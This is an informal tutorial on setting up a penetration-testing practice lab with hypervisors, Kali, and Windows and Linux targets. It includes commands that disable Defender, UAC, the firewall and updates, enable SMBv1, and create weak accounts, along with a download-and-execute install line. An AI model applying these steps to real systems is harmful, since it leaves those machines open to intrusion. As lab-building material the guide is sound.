Lab Setup - Building Your Practice Environment¶
Table of Contents¶
Foundation and Philosophy¶
- Why You Need a Lab
- What Happens When You Skip the Lab
- Lab vs Production Testing
- Legal Considerations
- Hardware Requirements
- Budget Planning
Virtualization Platforms¶
- Choosing Your Hypervisor
- VirtualBox Setup
- VMware Workstation
- Hyper-V Configuration
- KVM and QEMU
- Proxmox for Advanced Labs
Operating Systems¶
- Kali Linux Attack Machine
- Parrot Security OS
- Windows 10 Target Setup
- Windows 11 Configuration
- Windows Server Deployment
- Ubuntu Server Targets
- CentOS and RHEL
- Debian Targets
Network Configuration¶
- Understanding Virtual Networks
- NAT Network Setup
- Host-Only Networks
- Bridged Networking
- Internal Networks
- Network Segmentation
- VLAN Configuration
- pfSense Firewall Setup
Essential Tools¶
- Information Gathering Tools
- Nmap Mastery
- Metasploit Framework
- Burp Suite Configuration
- Wireshark Packet Analysis
- Hashcat Password Cracking
- John the Ripper
- SQLMap for Injection
- Gobuster Directory Enumeration
- Nikto Web Scanner
Active Directory Lab¶
- Building AD Environment
- Domain Controller Setup
- Adding Domain Users
- Group Policy Configuration
- Kerberos Attack Lab
- NTLM Relay Setup
- BloodHound Installation
Web Application Testing¶
Malware Analysis Lab¶
- Isolated Analysis Environment
- REMnux Setup
- Flare VM Configuration
- Cuckoo Sandbox
- INetSim Fake Services
Advanced Scenarios¶
- Cloud Security Lab
- Container Security
- Kubernetes Testing
- Wireless Security Lab
- IoT Device Testing
- Mobile Security Lab
Lab Management¶
Troubleshooting¶
Before you start hacking NASA or whatever delusional fantasy you have , you need a proper lab environment
No shortcuts , no "I'll just test this one thing on my router" bullshit that'll get you fired or arrested
This isn't just theory from some corporate training program , it's practical stuff that'll save you hours of headaches and potentially years in prison
Why You Need a Lab¶
Setting up a lab sounds like extra work when you could just fire up a VM and start hacking , right
Wrong , you absolute psychopath
A proper lab isn't just a VM , it's your controlled environment where mistakes don't cost you your job , your freedom , or your reputation , and if you think you can "just test one thing" on production systems or networks you don't own then you're not a security professional you're a future defendant
What happens when you skip the lab: - You test on unauthorized systems and go to prison (seriously , don't be that idiot) - You break production infrastructure and get fired immediately - You accidentally DDoS your company's mail server during "testing" (I've seen this happen) - You can't reproduce issues because you didn't document your environment - You have zero understanding of how attacks actually work , just that "the tutorial said run this" - Interviewers ask about your experience and you have nothing to show except "I read some articles"
What a proper lab actually gives you:
You can't learn offensive security by reading blog posts and watching YouTube videos , that's like learning surgery from Grey's Anatomy
You need to actually exploit vulnerabilities , test payloads , see attacks fail spectacularly , understand why they failed , fix your approach , and try again until it clicks
In a lab you can break things intentionally , restore from snapshot , and try again without legal consequences or angry system administrators hunting you down
Most people who skip the lab stay script kiddies forever , running tools they don't understand , copying commands from GitHub without knowing what they do , and getting absolutely wrecked in technical interviews when someone asks them to explain how their "exploit" actually works
Don't be most people , build the damn lab
What Happens When You Skip the Lab¶
Let me paint you a picture of what happens when you think you're too smart for a lab
Scenario 1: The Overconfident Intern
Fresh security certification in hand , decides to "test" the company network without authorization , runs nmap aggressive scan against production servers , triggers IDS alerts , gets called into HR within 30 minutes , fired before lunch
I've seen this happen four times , don't be number five
Scenario 2: The Home Network Hero
Thinks testing on home router is fine , accidentally bricks router firmware during exploit attempt , entire family loses internet , has to explain to non-technical parents why Netflix doesn't work , buys new router , never lives it down
Scenario 3: The Production Tester
"Just one quick test" on live web application , SQL injection payload works too well , drops production database , company loses customer data , legal team gets involved , career over
The Pattern:
Every single one of these people thought they were being careful , every single one thought "it's just a quick test" , every single one was wrong , and every single one could have avoided disaster with a proper lab
Build the lab , it's not optional
Lab vs Production Testing¶
Here's the fundamental difference that script kiddies don't understand
Lab Testing: - You own everything , no legal issues - Break whatever you want , snapshots exist for a reason - Document everything without worrying about disclosure - Test destructive exploits safely - Learn from failures without consequences - Build muscle memory through repetition
Production Testing (Authorized): - Requires explicit written permission and scope - Every action documented and logged - Can't use destructive techniques - Time-limited engagement - Legal liability if you screw up - One shot to get it right
Production Testing (Unauthorized): - Illegal , full stop - Criminal charges waiting to happen - Career-ending stupidity - Don't even think about it
The lab is where you learn , production is where you apply what you learned , mixing these up is how you end up with a criminal record
Legal Considerations¶
Let's talk about staying out of prison (at least for a while)
What's Legal: - Testing systems you own - Testing with explicit written authorization - Using vulnerable VMs designed for practice - Participating in authorized bug bounty programs - CTF competitions and practice platforms
What's Illegal: - Testing systems you don't own without permission - "Just checking" if a website is vulnerable - Scanning networks without authorization - Accessing systems beyond your authorized scope - Keeping access after engagement ends
The "I was just testing" Defense:
Doesn't work , has never worked , will never work
Courts don't care about your intentions , they care about unauthorized access , and "I wanted to learn" isn't a valid legal defense against computer fraud charges
Real Talk:
The Computer Fraud and Abuse Act (CFAA) in the US is broad enough to prosecute almost any unauthorized access , other countries have similar laws , and prosecutors love making examples of "hackers" who thought they were being helpful
Get authorization in writing , define scope explicitly , stay within boundaries , or stick to your lab where none of this matters
Hardware Requirements¶
You don't need enterprise hardware , but you do need enough resources to run multiple VMs simultaneously
Hold up , before we dive into all that 8 GB RAM shit let me tell you something real quick , I started out with a measly 6 GB RAM and an Intel Core i3 CPU , yeah , that's right , and I was still learning , running a main OS like ParrotSec OS , plus two VMs with KVM , one for a network lab and another for Windows 10 , it was tight , but it worked , so you don't need 8 GB RAM or some monster badass PC to kick things off , seriously , I've got friends who even started their whole journey with just an Android phone and Termux , imagine that , it's about the grind , not the gear , and one more thing I mentioned Kali Linux not Parrot as i use it in topics cuz Kali's the most used in any of tutorials online
Minimum Viable Setup: - CPU: Quad-core processor with virtualization support (Intel VT-x or AMD-V) - RAM: 16GB (8GB for host , 8GB for VMs) - Storage: 256GB SSD (i use a 1Tb HDD only btw) - Network: Ethernet connection (WiFi works but wired is better)
Recommended Setup: - CPU: 6-8 core processor - RAM: 32GB (gives you room for multiple VMs) - Storage: 256GB SSD , 1TB HDD - Network: Any connection (you bought a 32RAM and can't even get a simple adapter ?)
Professional Setup: - CPU: 8+ cores , high clock speed - RAM: 64GB+ (run entire AD forests) - Storage: 500GB/1TB+ NVMe + additional storage for ISOs - Network: Multiple NICs for complex scenarios
The Reality:
Most people start with 16GB RAM and upgrade later , that's fine , you can run Kali + 2-3 target VMs with 16GB if you're smart about resource allocation
Don't let hardware limitations stop you from starting , work with what you have and upgrade when you hit actual bottlenecks
What Actually Matters:
SSD is non-negotiable , running VMs on spinning rust is painful , virtualization support in BIOS must be enabled , and enough RAM to avoid constant swapping
Everything else is nice to have
Budget Planning¶
Let's talk money because most people starting out don't have unlimited budgets
The Truth About Certifications:
None of these are necessary to learn security , they're career accelerators after you already know your shit , and spending thousands on certs before you've built a lab is backwards
Build skills first , get certs later when they actually matter for job applications
Where to Spend Money:
- Hardware (RAM and SSD upgrades give immediate returns)
- Practice platforms (HTB , THM give structured learning)
- Specific tools if you need them professionally
Where NOT to Spend Money:
- Expensive courses promising to make you a hacker in 30 days (every paid course has its free version in another place)
- Certifications before you have practical skills
- Fancy hardware you don't need yet
- Tools that have free alternatives
Start free , upgrade strategically , don't waste money trying to buy skills
Choosing Your Hypervisor¶
Your hypervisor is the foundation of everything , choose based on your host OS and use case
VirtualBox - The Universal Choice
Free , cross-platform , good enough for most people
Pros: - Completely free for everything - Runs on Windows , Linux , macOS - Easy to learn , straightforward interface - Snapshots work well - Extension pack adds USB passthrough - Massive community support
Cons: - Performance isn't amazing - 3D acceleration is mediocre - Networking can be quirky - Occasional weird bugs - Not as polished as paid options
When to use VirtualBox: - You're just starting out - You switch between host OSes - You don't want to spend money - You're doing basic lab scenarios - You need something that just works
VMware Workstation - The Professional Standard
Paid but powerful , industry standard for a reason
Pros: - Better performance than VirtualBox - Rock solid stability - Advanced networking features - Linked clones save disk space - Better snapshot management - Professional features (vCenter integration)
Cons: - Costs $200 for license - Heavier resource usage - Linux version less polished than Windows - Overkill for basic learning
When to use VMware: - You're doing this professionally - You need better performance - Complex networking scenarios - You've outgrown VirtualBox - Company pays for license
Hyper-V - The Windows Native
Built into Windows Pro/Enterprise , free if you already have it
Pros: - Native Windows integration - Good performance - Free with Windows Pro - Type-1 hypervisor (runs on bare metal) - PowerShell automation
Cons: - Windows only - Can't run alongside VirtualBox/VMware - Interface takes getting used to - Less community content - Networking setup more complex
When to use Hyper-V: - You're on Windows Pro/Enterprise - You want native integration - You're learning Windows administration - You don't need cross-platform
KVM/QEMU - The Linux Native (My Bro)
Linux kernel-based virtualization , what cloud providers use
Pros: - Native Linux performance - Free and open source - What AWS/GCP use under the hood - Powerful once you learn it - Great for automation
Cons: - Steeper learning curve - Command-line heavy - GUI options exist but not as polished - Linux only
When to use KVM: - You're on Linux - You want maximum performance - You're comfortable with command line - You're building cloud-like infrastructure
Proxmox - The Advanced Option(never used btw)
Full virtualization platform , overkill for most but powerful
Pros: - Web-based management - Supports both VMs and containers - Clustering and high availability - Professional features - Free (paid support available)
Cons: - Requires dedicated hardware - More complex setup - Overkill for learning - Steeper learning curve
When to use Proxmox: - You have dedicated hardware - You're building a serious lab - You want to learn enterprise virtualization - You're running a home lab long-term
My Recommendation:
Start with VirtualBox , it's free and works everywhere
If you find yourself fighting with performance or stability , upgrade to VMware Workstation
If you're on Linux and comfortable with command line , KVM is excellent
Don't overthink this , any hypervisor works for learning , pick one and start building
VirtualBox Setup¶
Let's get VirtualBox installed and configured properly
Installation:
# Ubuntu / Debian
sudo apt update
sudo apt install virtualbox virtualbox-ext-pack
# Fedora / RHEL
sudo dnf install VirtualBox
# Arch
sudo pacman -S virtualbox virtualbox-host-modules-arch
# Windows
# Download from virtualbox.org and run installer
Post-Installation Configuration:
# Add your user to vboxusers group (Linux)
sudo usermod -aG vboxusers $USER
# Log out and back in for this to take effect
# Verify installation
vboxmanage --version
# Install Extension Pack (for USB support , RDP , etc)
# Download from virtualbox.org/wiki/Downloads
# File -> Preferences -> Extensions -> Add
Essential Settings:
File → Preferences → General: - Default Machine Folder: Set to SSD location with plenty of space - VRDP Authentication Library: Leave default
File → Preferences → Network: - Add Host-only Network: vboxnet0 (192.168.56.1/24) - Add NAT Network: NatNetwork (10.0.2.0/24)
Creating Your First VM:
# Via GUI:
# New -> Name: Kali-Lab -> Type: Linux -> Version: Debian 64-bit
# Memory: 4096 MB
# Hard disk: Create virtual hard disk now
# Type: VDI
# Storage: Dynamically allocated
# Size: 80 GB
# Via command line:
vboxmanage createvm --name "Kali-Lab" --ostype Debian_64 --register
vboxmanage modifyvm "Kali-Lab" --memory 4096 --cpus 2
vboxmanage createhd --filename ~/VirtualBox\ VMs/Kali-Lab/Kali-Lab.vdi --size 80000
vboxmanage storagectl "Kali-Lab" --name "SATA Controller" --add sata --controller IntelAhci
vboxmanage storageattach "Kali-Lab" --storagectl "SATA Controller" --port 0 --device 0 --type hdd --medium ~/VirtualBox\ VMs/Kali-Lab/Kali-Lab.vdi
Performance Tweaks:
Settings -> System -> Motherboard: - Enable I/O APIC - Hardware Clock in UTC Time
Settings -> System -> Processor: - CPUs: 2-4 (don't allocate more than half your physical cores) - Enable PAE/NX
Settings -> Display: - Video Memory: 128 MB - Graphics Controller: VMSVGA - Enable 3D Acceleration (if needed)
Settings -> Storage: - Controller: SATA -> Use Host I/O Cache
Common VirtualBox Issues:
VM won't start - "VT-x is disabled":
# Enable virtualization in BIOS
# Reboot -> Enter BIOS -> CPU Configuration -> Enable Intel VT-x or AMD-V
Slow performance:
# Allocate more RAM
# Use SSD for VM storage
# Enable Host I/O Cache
# Don't run too many VMs simultaneously
Network not working:
# Check adapter is enabled
# Try different network mode (NAT vs Bridged)
# Restart network service in guest
sudo systemctl restart NetworkManager
VirtualBox is solid for learning , don't let anyone tell you otherwise
VMware Workstation¶
If you've got the budget or company license , VMware is excellent
Installation:
# Linux
chmod +x VMware-Workstation-Full-*.bundle
sudo ./VMware-Workstation-Full-*.bundle
# Windows
# Download from vmware.com and run installer
# Enter license key when prompted
Initial Configuration:
Edit → Preferences → Memory: - Reserved memory: Leave some for host OS - Additional memory: Allow most memory to be swapped
Edit → Preferences → Priority: - Snapshot: Keep snapshots with virtual machine
Creating VMs:
File → New Virtual Machine → Custom - Hardware compatibility: Workstation 16.x - Install from: ISO image - Guest OS: Linux → Debian 10.x 64-bit - VM Name: Kali-Lab - Processors: 2 - Memory: 4096 MB - Network: NAT - I/O Controller: LSI Logic - Disk: SCSI - Create new virtual disk - Size: 80 GB - Store as single file
Advanced Features:
Linked Clones:
# Create base VM
# Take snapshot
# Right-click → Manage → Clone
# Select "Linked clone"
# Saves massive disk space
Shared Folders:
# VM → Settings → Options → Shared Folders
# Add folder from host
# Access in guest at /mnt/hgfs/
Network Editor:
# Edit → Virtual Network Editor
# Add custom networks
# Configure DHCP , NAT , subnets
# Much more powerful than VirtualBox
VMware is worth it if you're serious , but VirtualBox works fine for learning
Hyper-V Configuration¶
Windows Pro/Enterprise users have Hyper-V built in
Enabling Hyper-V:
# PowerShell as Administrator
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All
# Or via GUI:
# Control Panel → Programs → Turn Windows features on/off
# Check: Hyper-V
# Reboot
Hyper-V Manager:
# Open Hyper-V Manager
virtmgmt.msc
# Create Virtual Switch
# Hyper-V Manager → Virtual Switch Manager
# New virtual network switch → External
# Name: External-Switch
Creating VMs:
# Via GUI:
# Action → New → Virtual Machine
# Name: Kali-Lab
# Generation: 2 (for UEFI)
# Memory: 4096 MB
# Network: External-Switch
# Create virtual hard disk: 80 GB
# Install from ISO
# Via PowerShell:
New-VM -Name "Kali-Lab" -MemoryStartupBytes 4GB -Generation 2 -NewVHDPath "C:\Hyper-V\Kali-Lab.vhdx" -NewVHDSizeBytes 80GB
Set-VMProcessor -VMName "Kali-Lab" -Count 2
Add-VMNetworkAdapter -VMName "Kali-Lab" -SwitchName "External-Switch"
Hyper-V Quirks:
Can't run alongside VirtualBox/VMware (they conflict)
Nested virtualization requires specific CPU support
Better for Windows-focused labs
KVM and QEMU¶
Linux users get native kernel-based virtualization
Installation:
# Ubuntu/Debian
sudo apt install qemu-kvm libvirt-daemon-system libvirt-clients bridge-utils virt-manager
# Fedora
sudo dnf install @virtualization
# Arch
sudo pacman -S qemu libvirt virt-manager
# Add user to libvirt group
sudo usermod -aG libvirt $USER
sudo systemctl enable --now libvirtd
Verify KVM Support:
# Check CPU virtualization support
egrep -c '(vmx|svm)' /proc/cpuinfo
# Should return > 0
# Check KVM modules loaded
lsmod | grep kvm
# Should see kvm_intel or kvm_amd
# Verify installation
virsh list --all
Creating VMs with virt-manager:
# Launch GUI
virt-manager
# File → New Virtual Machine
# Local install media → Browse to ISO
# Memory: 4096 MB
# CPUs: 2
# Storage: 80 GB
# Network: NAT
Command-Line VM Creation:
# Create VM
virt-install \
--name kali-lab \
--ram 4096 \
--disk path=/var/lib/libvirt/images/kali-lab.qcow2,size=80 \
--vcpus 2 \
--os-type linux \
--os-variant debian10 \
--network bridge=virbr0 \
--graphics vnc \
--cdrom /path/to/kali.iso
# Manage VMs
virsh list --all
virsh start kali-lab
virsh shutdown kali-lab
virsh destroy kali-lab # Force stop
virsh undefine kali-lab # Delete VM
KVM performance is excellent , worth learning if you're on Linux
Proxmox for Advanced Labs¶
Proxmox is enterprise-grade , overkill for most but powerful
Installation:
Requires dedicated hardware (bare metal installation)
Download ISO from proxmox.com , burn to USB , boot and install
Access Web Interface:
# After installation
# Browse to: https://your-server-ip:8006
# Login with root credentials
Creating VMs:
Web UI → Create VM: - General: VM ID , Name - OS: Upload ISO - System: QEMU Agent enabled - Disks: 80 GB - CPU: 2 cores - Memory: 4096 MB - Network: vmbr0
Container Support:
Proxmox supports LXC containers alongside VMs
Lighter weight than full VMs , perfect for services
Clustering:
Multiple Proxmox nodes can cluster for high availability
Way beyond what most people need for a lab
Only use Proxmox if you're building a serious long-term lab environment
Kali Linux Attack Machine¶
Kali is the default attack platform , Debian-based with hundreds of security tools pre-installed
But here's what they don't tell you , Kali isn't a daily driver OS , it's a specialized toolbox , and using it as your main system is like wearing a hazmat suit to the grocery store , technically possible but completely unnecessary
Downloading Kali:
# Get the latest from kali.org/get-kali
# Options:
# - Installer ISO (recommended for VMs)
# - Live ISO (for USB booting)
# - Pre-built VM images (VirtualBox , VMware)
# - Cloud images (AWS , Azure)
# For lab use , grab the installer ISO
wget https://cdimage.kali.org/kali-2025.3/kali-linux-2025.3-installer-amd64.iso
# Or use the pre-built VM (faster)
https://www.kali.org/get-kali/#kali-virtual-machines
# Choose what needed for the VM you use
Installation:
# Boot from ISO
# Select: Graphical Install
# Language: English
# Location: Your country
# Keyboard: Your layout
# Hostname: kali-lab
# Domain: (leave blank for lab)
# Root password: (set strong password)
# Create user: kali
# Partitioning: Guided - use entire disk
# Write changes: Yes
# Install GRUB: Yes
# Installation complete: Reboot
First Boot Configuration:
# Update everything immediately
sudo apt update && sudo apt full-upgrade -y
# Install useful tools not included by default
sudo apt install -y \
terminator \
tmux \
vim \
git \
curl \
wget \
python3-pip \
gobuster \
seclists \
feroxbuster
# Install VM guest additions (VirtualBox)
sudo apt install -y virtualbox-guest-x86
# Install VMware tools (VMware)
sudo apt install -y open-vm-tools-desktop
# Enable and start SSH (for remote access)
sudo systemctl enable ssh
sudo systemctl start ssh
# Change default SSH keys (security)
sudo rm /etc/ssh/ssh_host_*
sudo dpkg-reconfigure openssh-server
Essential Kali Tweaks:
# Set up proper aliases
cat >> ~/.zshrc << 'EOF'
alias ll='ls -lah'
alias nse='ls /usr/share/nmap/scripts/ | grep'
alias www='python3 -m http.server 8000'
alias myip='ip -4 addr show tun0 | grep -oP "(?<=inet\s)\d+(\.\d+){3}"'
EOF
# Install additional wordlists
sudo apt install -y seclists wordlists
# Update locate database
sudo updatedb
# Set up Metasploit database
sudo msfdb init
Kali Tools Organization:
Kali groups tools by category , learn where things are
# Information Gathering
/usr/share/nmap/
/usr/share/wordlists/
# Vulnerability Analysis
/usr/share/metasploit-framework/
/usr/share/sqlmap/
# Web Applications
/usr/share/burpsuite/
/usr/share/dirb/
# Password Attacks
/usr/share/john/
/usr/share/hashcat/
# Wireless Attacks
/usr/share/aircrack-ng/
# Exploitation Tools
/usr/share/exploitdb/
/usr/share/metasploit-framework/modules/
Common Kali Mistakes:
Using Kali as daily driver: Don't , use Ubuntu or Fedora for daily work , Kali for security testing only
Running everything as root: Kali defaults to non-root now , keep it that way , use sudo when needed
Not updating regularly: Tools get outdated fast , update weekly minimum
sudo apt update && sudo apt full-upgrade -y
Installing random tools from GitHub without vetting: Not everything on GitHub is safe , even in security tools , read the code before running
Kali in the Cloud:
# AWS EC2
# Use official Kali AMI from AWS Marketplace
# t2.medium minimum (2 vCPU , 4GB RAM)
# DigitalOcean
# Use Kali droplet from marketplace
# $24/month for 2GB RAM
# Only use cloud Kali for authorized testing
# Scan from cloud = your IP gets flagged fast
# Use VPN or proxy for opsec
Kali is solid , learn it well , but remember it's a tool not a personality
Parrot Security OS¶
Parrot is Kali's cousin , Debian-based , similar tools , different philosophy
Why Parrot Over Kali:
- Lighter resource usage (better for older hardware)
- More privacy-focused (Anonsurf built-in)
- Better for forensics (more DFIR tools)
- Can be used as daily driver (Home edition)
- Looks prettier (subjective but true)
Why Kali Over Parrot:
- Larger community
- More documentation
- Official Offensive Security support
- More frequent updates
- Industry standard
Downloading Parrot:
# Security Edition (for pentesting)
wget https://deb.parrot.sh/parrot/iso/6.4/Parrot-security-6.4_amd64.iso
# Home Edition (for daily use + security tools)
wget https://deb.parrot.sh/parrot/iso/6.4/Parrot-home-6.4_amd64.iso
Installation:
Same process as Kali , Debian installer , straightforward
Unique Parrot Features:
# Anonsurf (Tor routing)
sudo anonsurf start
sudo anonsurf status
sudo anonsurf stop
# Wifiphisher (pre-installed)
sudo wifiphisher
# More forensics tools out of box
autopsy
volatility
foremost
My Take:
Both work fine , Kali has better community support , Parrot is lighter and prettier
Pick one , learn it deeply , don't distro-hop like you're collecting Pokemon
Windows 10 Target Setup¶
Most corporate environments run Windows , you need Windows targets in your lab
Getting Windows 10:
# Microsoft provides evaluation VMs
# https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/
# Download options:
# - VirtualBox
# - VMware
# - Hyper-V
# - Parallels
# These expire after 90 days but you can:
# 1. Rearm (extends 3 times = 120 days total)
# 2. Snapshot before expiration , restore when needed
# 3. Download fresh VM when expired
Manual Installation:
# Download Windows 10 ISO
# https://www.microsoft.com/software-download/windows10
# Create VM:
# - RAM: 4GB minimum
# - Storage: 60GB
# - Network: Host-only (isolated)
# - Install without product key (evaluation mode)
Post-Installation Configuration:
# Disable Windows Defender (for testing)
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableBehaviorMonitoring $true
# Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# Disable firewall (lab only!)
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
# Enable WinRM (for remote management)
Enable-PSRemoting -Force
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force
# Create local admin user
net user labadmin P@ssw0rd123! /add
net localgroup Administrators labadmin /add
# Install Chocolatey (package manager)
Set-ExecutionPolicy Bypass -Scope Process -Force
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072
iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
# Install useful tools
choco install -y 7zip notepadplusplus python3 git
Making Windows Intentionally Vulnerable:
# Disable UAC
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0
# Enable SMBv1 (vulnerable)
Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
# Disable Windows Update (keep old vulnerable software)
Stop-Service wuauserv
Set-Service wuauserv -StartupType Disabled
# Install old vulnerable software
choco install -y adobereader --version=11.0.10
choco install -y firefox --version=52.0
Snapshot Strategy:
# Take snapshots at key points:
# 1. Fresh install (clean slate)
# 2. After basic config (defender disabled , RDP enabled)
# 3. After installing vulnerable software
# 4. Before each testing session
# This lets you reset quickly when you break something
Common Windows Lab Scenarios:
- SMB relay attacks
- Kerberos attacks (Golden/Silver tickets)
- Pass-the-hash
- Mimikatz credential dumping
- Privilege escalation
- Lateral movement
You need Windows targets , don't skip this
Windows 11 Configuration¶
Windows 11 is newer , different attack surface , worth having in lab
Getting Windows 11:
# Download ISO
# https://www.microsoft.com/software-download/windows11
# Or evaluation VM
# https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/
Windows 11 Specific Issues:
TPM Requirement:
# VirtualBox: Settings → System → Enable EFI
# VMware: Add TPM in VM settings
# Or bypass TPM check during install (not recommended for learning)
Secure Boot:
Enable in VM settings to match real-world deployments
Configuration:
Same as Windows 10 , disable Defender , enable RDP , create users
Windows 11 Security Features to Test:
- Windows Hello (biometric auth)
- Credential Guard
- Application Guard
- Controlled Folder Access
- Attack Surface Reduction rules
Having both Win10 and Win11 targets shows you how defenses evolved
Windows Server Deployment¶
Active Directory requires Windows Server , this is non-negotiable for AD labs
Getting Windows Server:
# Evaluation versions (180 days)
# https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2022
# Download:
# - Windows Server 2022 (latest)
# - Windows Server 2019 (still common)
# - Windows Server 2016 (legacy systems)
Installation:
# Create VM:
# - RAM: 4GB minimum (8GB better for DC)
# - Storage: 60GB
# - Network: Internal network (isolated AD environment)
# - Install: Desktop Experience (GUI)
Initial Configuration:
# Set static IP
New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.100.10 -PrefixLength 24 -DefaultGateway 192.168.100.1
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 192.168.100.10
# Rename computer
Rename-Computer -NewName "DC01" -Restart
# Install AD DS role
Install-WindowsFeature -Name AD-Domain-Services -IncludeManagementTools
# Promote to Domain Controller
Install-ADDSForest `
-DomainName "lab.local" `
-DomainNetbiosName "LAB" `
-ForestMode "WinThreshold" `
-DomainMode "WinThreshold" `
-InstallDns `
-SafeModeAdministratorPassword (ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force) `
-Force
More on AD lab setup in dedicated section below
Ubuntu Server Targets¶
Linux servers are everywhere , you need them in your lab
Downloading Ubuntu Server:
# Get latest LTS
wget https://releases.ubuntu.com/noble/ubuntu-24.04.3-live-server-amd64.iso
# LTS versions get 5 years support
Installation:
# Create VM:
# - RAM: 2GB minimum
# - Storage: 20GB
# - Network: Host-only
# - Install: OpenSSH server (select during install)
# Installation prompts:
# Language: English
# Keyboard: Your layout
# Network: DHCP (configure static later)
# Storage: Use entire disk
# Profile: username/password
# SSH: Install OpenSSH server
# Snaps: Skip for now
Post-Installation:
# SSH into server
ssh user@192.168.56.20
# Update system
sudo apt update && sudo apt upgrade -y
# Install LAMP stack
sudo apt install -y apache2 mysql-server php php-mysql
# Secure MySQL
sudo mysql_secure_installation
# Test web server
curl localhost
# Should see Apache default page
# Install additional tools
sudo apt install -y \
net-tools \
vim \
git \
curl \
wget \
ufw
Making Ubuntu Intentionally Vulnerable:
# Disable firewall (lab only)
sudo ufw disable
# Install old PHP version
sudo apt install -y php7.4
# Weak permissions on web root
sudo chmod 777 /var/www/html
# Create weak user accounts
sudo useradd -m -s /bin/bash testuser
echo "testuser:password123" | sudo chpasswd
# Enable password authentication for SSH
sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /etc/ssh/sshd_config
sudo systemctl restart sshd
# Install vulnerable web apps (covered in web app section)
Common Ubuntu Lab Uses:
- Web application testing (LAMP stack)
- SSH brute forcing practice
- Privilege escalation scenarios
- Linux post-exploitation
- Service exploitation
CentOS and RHEL¶
Enterprise Linux distributions , different from Debian/Ubuntu
Why Include RHEL-based Systems:
- Different package manager (yum/dnf vs apt)
- Different file locations
- SELinux enforcing by default
- Common in enterprise environments
Getting CentOS Stream:
# CentOS Linux is dead , CentOS Stream is the replacement
https://www.centos.org/download/
# Or Rocky Linux (CentOS alternative)
https://rockylinux.org/download/
Installation:
Similar to Ubuntu , select minimal install for servers
Post-Installation:
# Update system
sudo dnf update -y
# Install LAMP
sudo dnf install -y httpd mariadb-server php php-mysqlnd
# Start services
sudo systemctl enable --now httpd
sudo systemctl enable --now mariadb
# Configure firewall
sudo firewall-cmd --permanent --add-service=http
sudo firewall-cmd --permanent --add-service=https
sudo firewall-cmd --reload
SELinux Considerations:
# Check SELinux status
getenforce
# Should show: Enforcing
# Temporarily disable (for testing)
sudo setenforce 0
# Permanently disable (lab only)
sudo sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config
sudo reboot
Having both Debian and RHEL-based targets prepares you for real environments
Debian Targets¶
Debian is Ubuntu's parent , more stable , less user-friendly
Why Debian:
- Rock solid stability
- Minimal bloat
- What many servers actually run
- Good for learning fundamentals
Getting Debian:
# Download stable release , pick your needs
https://www.debian.org/CD/http-ftp/#stable
Installation:
# Similar to Ubuntu
# Select: SSH server , Standard system utilities
# Skip desktop environment for servers
Configuration:
# Update
sudo apt update && sudo apt upgrade -y
# Install basics
sudo apt install -y apache2 mariadb-server php
# Debian uses older packages by default (good for finding vulns)
Debian is solid for stable server targets
Understanding Virtual Networks¶
Virtual networking is where most people get confused , let's fix that
Network Modes Explained:
NAT (Network Address Translation): - VM can access internet through host - VM can't be accessed from outside - VMs on same NAT can't talk to each other (usually) - Good for: Internet access , isolated testing
Host-Only: - VMs can talk to each other - VMs can talk to host - VMs can't access internet - Host can access VMs - Good for: Isolated lab networks , attack scenarios
Bridged: - VM appears as separate device on physical network - Gets IP from physical network DHCP - Can access internet directly - Other devices on network can access VM - Good for: Testing on real network , accessing from other devices - Bad for: Security (exposes lab to network)
Internal: - VMs can only talk to each other - No host access , no internet - Completely isolated - Good for: Air-gapped scenarios , malware analysis
The Right Setup for Labs:
# Typical lab configuration:
# - Kali: NAT (for internet) + Host-only (for targets)
# - Windows targets: Host-only only
# - Linux targets: Host-only only
# - AD environment: Internal network (isolated)
# This gives you:
# - Internet access on Kali (updates , downloads)
# - Isolated target network
# - No risk of scanning real network
NAT Network Setup¶
NAT gives VMs internet access through host
VirtualBox NAT Network:
# Create NAT network
VBoxManage natnetwork add --netname NatNetwork --network "10.0.2.0/24" --enable --dhcp on
# Or via GUI:
# File → Preferences → Network → NAT Networks → Add
# Name: NatNetwork
# CIDR: 10.0.2.0/24
# Enable DHCP
# Attach VM to NAT network
# VM Settings → Network → Adapter 1
# Attached to: NAT Network
# Name: NatNetwork
VMware NAT:
# VMware creates NAT network by default (VMnet8)
# Edit → Virtual Network Editor
# VMnet8 (NAT)
# Subnet: 192.168.137.0/24
# Attach VM:
# VM Settings → Network Adapter → NAT
Port Forwarding (Access VM from Host):
# VirtualBox port forwarding
VBoxManage modifyvm "VM-Name" --natpf1 "ssh,tcp,,2222,,22"
VBoxManage modifyvm "VM-Name" --natpf1 "http,tcp,,8080,,80"
# Now access:
ssh user@localhost -p 2222
curl http://localhost:8080
NAT is simple , good for internet access , not ideal for lab networking
Host-Only Networks¶
Host-only is perfect for isolated lab networks
VirtualBox Host-Only:
# Create host-only network
VBoxManage hostonlyif create
VBoxManage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1 --netmask 255.255.255.0
# Enable DHCP (optional)
VBoxManage dhcpserver add --netname HostInterfaceNetworking-vboxnet0 --ip 192.168.56.2 --netmask 255.255.255.0 --lowerip 192.168.56.100 --upperip 192.168.56.200 --enable
# Or via GUI:
# File → Host Network Manager
# Create
# Adapter: 192.168.56.1/24
# DHCP Server: Enable
# Attach VM:
# VM Settings → Network → Adapter 2
